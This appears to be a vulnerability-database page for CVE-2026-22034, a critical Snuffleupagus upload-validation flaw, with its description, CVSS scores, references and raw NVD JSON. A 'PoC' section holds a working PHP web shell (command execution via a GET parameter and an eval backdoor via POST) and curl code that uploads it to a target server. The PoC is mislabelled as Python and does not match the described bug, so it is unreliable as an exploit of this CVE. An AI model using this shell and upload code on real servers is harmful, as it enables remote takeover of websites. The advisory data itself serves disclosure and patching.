CVE-2026-22034

Description

Snuffleupagus is a module that raises the cost of attacks against website by killing bug classes and providing a virtual patching system. On deployments of Snuffleupagus prior to version 0.13.0 with the non-default upload validation feature enabled and configured to use one of the upstream validation scripts based on Vulcan Logic Disassembler (VLD) while the VLD extension is not available to the CLI SAPI, all files from multipart POST requests are evaluated as PHP code. The issue was fixed in version 0.13.0.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:jvoisin:snuffleupagus:*:*:*:*:*:*:*:* - VULNERABLE

Snuffleupagus < 0.13.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php
// CVE-2026-22034 PoC - Snuffleupagus Upload Validation RCE
// This PoC demonstrates how a malicious PHP file can be executed
// when Snuffleupagus upload validation is enabled without VLD extension

// Malicious file content to be uploaded
$malicious_payload = '<?php
// Attempt to execute system commands
if(isset($_GET["cmd"])) {
    echo "<pre>";
    system($_GET["cmd"]);
    echo "</pre>";
}
// Or backdoor connection
@eval($_POST["backdoor"]);
?>';

// Simulate multipart POST upload request
$boundary = "----WebKitFormBoundary" . bin2hex(random_bytes(16));

$post_data = "--$boundary\r\n";
$post_data .= "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n";
$post_data .= "Content-Type: application/x-php\r\n\r\n";
$post_data .= $malicious_payload . "\r\n";
$post_data .= "--$boundary--\r\n";

// Send the malicious upload request
$ch = curl_init("http://target-server.com/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    "Content-Type: multipart/form-data; boundary=$boundary"
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

echo "Upload completed. Access shell at: http://target-server.com/uploads/shell.php?cmd=id\n";
?>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22034
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22034
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22034/
[4] VulDB https://vuldb.com/cve/CVE-2026-22034
[5] https://github.com/jvoisin/snuffleupagus/blob/9278dc77bab2a219e770a1b31dd6797bc9070e37/src/sp_upload_validation.c#L92-L100
[6] https://github.com/jvoisin/snuffleupagus/blob/v0.12.0/scripts/upload_validation.php
[7] https://github.com/jvoisin/snuffleupagus/blob/v0.12.0/scripts/upload_validation.py
[8] https://github.com/jvoisin/snuffleupagus/commit/9278dc77bab2a219e770a1b31dd6797bc9070e37
[9] https://github.com/jvoisin/snuffleupagus/security/advisories/GHSA-c4ch-xw5p-2mvc
[10] https://github.com/php/php-src/blob/e4098da58a9eaee759d728d98a27d809cde37671/ext/standard/dl.c#L165-L166
[11] https://github.com/php/php-src/blob/e4098da58a9eaee759d728d98a27d809cde37671/main/rfc1867.c#L1269-L1274
[12] https://snuffleupagus.readthedocs.io/config.html#upload-validation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22034", "sourceIdentifier": "[email protected]", "published": "2026-01-08T15:15:45.150", "lastModified": "2026-03-09T14:04:29.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Snuffleupagus is a module that raises the cost of attacks against website by killing bug classes and providing a virtual patching system. On deployments of Snuffleupagus prior to version 0.13.0 with the non-default upload validation feature enabled and configured to use one of the upstream validation scripts based on Vulcan Logic Disassembler (VLD) while the VLD extension is not available to the CLI SAPI, all files from multipart POST requests are evaluated as PHP code. The issue was fixed in version 0.13.0."}, {"lang": "es", "value": "Snuffleupagus es un módulo que eleva el coste de los ataques contra sitios web eliminando clases de errores y proporcionando un sistema de parcheo virtual. En despliegues de Snuffleupagus anteriores a la versión 0.13.0 con la característica de validación de subida no predeterminada habilitada y configurada para usar uno de los scripts de validación ascendentes basados en Vulcan Logic Disassembler (VLD) mientras la extensión VLD no está disponible para la SAPI CLI, todos los archivos de las solicitudes POST multipart se evalúan como código PHP. El problema se solucionó en la versión 0.13.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-636"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jvoisin:snuffleupagus:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.13.0", "matchCriteriaId": "27E48E9D-66B6-409E-8510-A8770570D1A4"}]}]}], "references": [{"url": "https://github.com/jvoisin/snuffleupagus/blob/9278dc77bab2a219e770a1b31dd6797bc9070e37/src/sp_upload_validation.c#L92-L100", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/jvoisin/snuffleupagus/blob/v0.12.0/scripts/upload_validation.php", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/jvoisin/snuffleupagus/blob/v0.12.0/scripts/upload_validation.py", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/jvoisin/snuffleupagus/commit/9278dc77bab2a219e770a1b31dd6797bc9070e37", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/jvoisin/snuffleupagus/security/advisories/GHSA-c4ch-xw5p-2mvc", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory", "Exploit"]}, {"url": "https://github.com/php/php-src/blob/e4098da58a9eaee759d728d98a27d809cde37671/ext/standard/dl.c#L165-L166", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/php/php-src/blob/e4098da58a9eaee759d728d98a27d809cde37671/ma ... (truncated)